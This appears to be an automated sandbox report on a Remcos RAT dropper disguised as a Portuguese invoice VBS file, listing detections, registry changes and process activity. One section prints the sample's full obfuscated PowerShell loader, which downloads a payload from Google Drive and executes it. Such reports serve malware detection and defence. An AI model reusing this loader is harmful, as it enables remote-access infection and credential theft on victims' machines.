Malware Analysis Report

2024-12-01 03:08

Sample ID 241111-p77dlszdmh
Target 11112024_1259_detalhe_fatura_20241105�pd.vbs.zip
SHA256 2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab

Threat Level: Known bad

The file 11112024_1259_detalhe_fatura_20241105�pd.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos family

Remcos

NirSoft WebBrowserPassView

Detected Nirsoft tools

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 12:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 12:59

Reported

2024-11-11 13:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabE0D0.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2896-20-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2896-22-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/2896-21-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2896-23-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-24-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-26-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-27-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-28-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

memory/2896-29-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-30-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-31-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

memory/2896-32-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 12:59

Reported

2024-11-11 13:04

Platform

win10v2004-20241007-en

Max time kernel

300s

Max time network

290s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4276 set thread context of 3604 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 set thread context of 60 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 set thread context of 1272 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4576 wrote to memory of 3128 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4576 wrote to memory of 3128 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 744 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 744 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 744 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 744 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 wrote to memory of 4816 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4816 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4816 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4816 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4816 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4816 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4276 wrote to memory of 2208 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4276 wrote to memory of 2208 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
